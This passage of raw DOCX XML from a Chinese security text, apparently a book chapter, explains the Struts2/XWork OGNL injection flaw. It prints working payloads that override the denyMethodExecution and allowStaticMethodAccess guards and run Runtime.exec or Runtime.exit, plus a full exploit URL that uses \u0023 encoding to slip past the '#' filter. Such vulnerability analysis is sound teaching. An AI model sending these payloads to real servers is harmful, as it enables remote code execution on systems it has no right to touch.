                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>缺省为</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>true)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="34"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="204" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>SecurityMemberAccess</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:spacing w:val="-5"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>private</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:spacing w:val="-5"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>field</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:spacing w:val="-5"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>called</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:spacing w:val="-5"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>'allowStaticMethodAccess</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:spacing w:val="-2"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>' (</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>缺省为</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>false)</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>由于参数完全是用户可控的，所以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XWork </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>出于安全的目的，增加了两个方法用以阻止代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>但这两个方法可以被覆盖，从而导致代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:6.443125pt;width:411.15pt;height:50.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4624;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="3566" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#_memberAccess['allowStaticMethodAccess'] = true #foo = new java .lang.Boolean("false")</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="2"/>
                    <w:ind w:left="28" w:right="2510" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = @java.lang.Runtime@getRuntime()</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#rt.exec('mkdir /tmp/PWNED')</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="140"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ParametersInterceptor </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是不允许参数名称中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的，因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OGNL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中的许多预定义变量也是以</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>表示的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4648;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,13.635pt" to="158.16pt,13.635pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="357" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="356" w:right="0" w:hanging="153"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark13" w:id="77"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:hyperlink r:id="rId82">
        <w:bookmarkStart w:name="_bookmark13" w:id="78"/>
        <w:bookmarkEnd w:id="78"/>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>ht</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>tp://www.exploit-db.com/exploits/14360/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId80"/>
          <w:headerReference w:type="even" r:id="rId81"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:shape style="width:411.15pt;height:110.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="169" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="28" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#context</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>OgnlContext,</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>the</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>one</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>guarding</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>method</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>execution</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>based</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>on</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-57"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>'xwork.MethodAccessor. denyMethodExecution' property</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-3"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>value.</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="173" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="2"/>
                    <w:ind w:left="28" w:right="24" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#_memberAccess</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-53"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>-</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-53"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>SecurityMemberAccess,</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-53"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>whose</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-53"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>'allowStaticAccess'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-53"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>field</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-53"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>prevented</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-53"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>static method</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-2"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>execution.</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#root</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#this</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#_typeResolver</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#_classResolver</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="21"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#_traceEvaluations</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#_lastEvaluation</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="36"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>#_keepLastEvaluation</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="136"/>
        <w:ind w:left="203" w:right="182" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:40.319992pt;width:411.15pt;height:50.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4696;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="13" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId83">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>http://mydomain/MyStruts.action?('\u0023_memberAccess[</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>\'allowStaticMethodAccess\']')( meh)=true&amp;(aaa)(('\u0023context[\'xwork.MethodAccessor.den yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false"))</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="28" w:right="1357" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId84">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>)&amp;(asdf)(('\u0023rt.exit(1)')(\u0023rt\</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:hyperlink r:id="rId85">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>u003d@java.lang.Runtime@getRunti</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> me()))=1</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可是攻击者在过去找到了这样的方法（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bug </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>编号 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XW-641</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>\u0023 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
